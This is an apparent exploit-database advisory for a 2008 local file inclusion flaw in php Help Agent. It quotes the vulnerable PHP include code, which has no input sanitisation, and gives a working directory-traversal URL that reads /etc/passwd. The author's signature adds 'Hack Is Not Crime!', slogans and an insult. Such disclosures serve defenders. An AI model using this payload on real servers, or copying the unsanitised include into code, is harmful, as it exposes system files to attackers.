php Help Agent (v1.1 Full & 1.0) Local File Include

vendor:

php Help Agent

by:

BeyazKurt

8.8

CVSS

HIGH

Local File Include

CWE

Product Name: php Help Agent

Affected Version From: 1

Affected Version To: 1.1

Patch Exists: NO

Related CWE: N/A

CPE: a:phphelpagent:php_help_agent

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

php Help Agent (v1.1 Full & 1.0) Local File Include

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'content' parameter to '/include/head_chat.inc.php' script. This can be exploited to include arbitrary files from local resources via directory traversal attacks.

Mitigation:

Input validation should be used to prevent directory traversal attacks.

Source

Exploit-DB raw data:

#####################################################
# Author : BeyazKurt
# Contact : Djm-sut@Hotmail.Com
#
# Script : php Help Agent (v1.1 Full & 1.0)
# Risk : Local File Include
# Download : http://sourceforge.net/projects/phphelpagent/
#
# File : include/head_chat.inc.php
#
# Code :
# <?php
#     if(file_exists($content)) {
#   include($content);
#     }
# ?>
#
# Exploit :
#
#  Vuln.Com/include/head_chat.inc.php?content=../../../../etc/passwd
#
# /* Hack Is Not Crime! */
# -------------------------------
#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
#                      Proud 2 Be ALBANIAN
#                      4Ever FENERBAHÃ‡E (H)
#
# Z0ne-H gicik v1 is public :D (Download NetkabuS.CoM)
# Not : Fuck off pala! aq lameri.
#
# Thnx : All Muslims Albanian & Turkish Coder..
# Thnx : dArkSAnqelSu | anladin sen onu anladin... :)
#
#######################################################

# milw0rm.com [2008-07-15]